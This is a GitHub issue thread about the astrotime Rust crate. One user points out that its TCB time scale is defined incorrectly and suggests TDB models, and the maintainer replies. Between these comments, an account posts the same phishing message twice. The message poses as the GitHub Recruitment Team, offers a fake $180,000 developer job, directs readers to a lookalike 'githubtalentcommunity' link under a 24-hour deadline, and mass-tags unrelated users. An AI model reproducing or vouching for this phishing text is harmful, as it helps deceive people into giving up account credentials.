### ISSUE TITLE
TCB is not defined correctly

### ISSUE THREAD

**Issue by spenczar** [mikedilger/astrotime#2]
TCB is a dynamical coordinate time scale which does not proceed at a fixed rate relative to TT. [This implementation](https://github.com/mikedilger/astrotime/blob/master/src/standard.rs#L86-L92) is not correct.

See, for example, the description provided by SOFA: 
<img width="623" alt="image" src="https://github.com/mikedilger/astrotime/assets/880413/8104ca63-2d67-4599-9648-41dc380dc875">

In fact, because of this, most people use TDB in practice, since it has a quasi-periodic behavior that can be approximated. See [Fairhead and Bretagnon](https://adsabs.harvard.edu/full/1990A%26A...229..240F) for a useful model. TDB can only be specified at a particular location, though. You could assume the geocenter but you'd be off by a significant amount (microseconds).

**Comment by mikedilger** [comment]
Great info, thanks. This repo has long been idle, I never finished what I started here, but if I come back to it, I'll take this into consideration.

**Comment by spenczar** [comment]
Yep, makes sense. I came across it because I'm doing some work on orbit determination and ephemeris generation in Rust, and needed an astronomy-quality time library. You're the first thing that shows up in crates.io when you look in that direction.

**Comment by sherlok235** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
onurbyrkl, @Emirssss, @wraithuwu, @sreegowthamj, @jmyers0808, @JohFritz, @SadmaNN41, @balu0230, @zingarotemporaneo, @gjlmotea, @Skanda87, @zxcj04, @jonyg80, @liuweiwei861123, @demirhankarademir, @dutchpatriot, @Huanying04, @bydevelopet, @HR, @winnerboyboom1

**Comment by sherlok235** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
antoniomng, @keremdesu, @icai, @sefagvn, @sasa980, @Test12312321, @sergiocabral, @zRich, @ibiszek21, @eriestrsnd, @LauraS0, @whoops01, @Ueyalia, @DeVoLoKo4710, @ScriptGorilla, @c-nv-s, @Rocky5708, @s20208413, @measses, @PJ-Finlay

**Comment by mikedilger** [comment]
These time standards were removed a while ago.
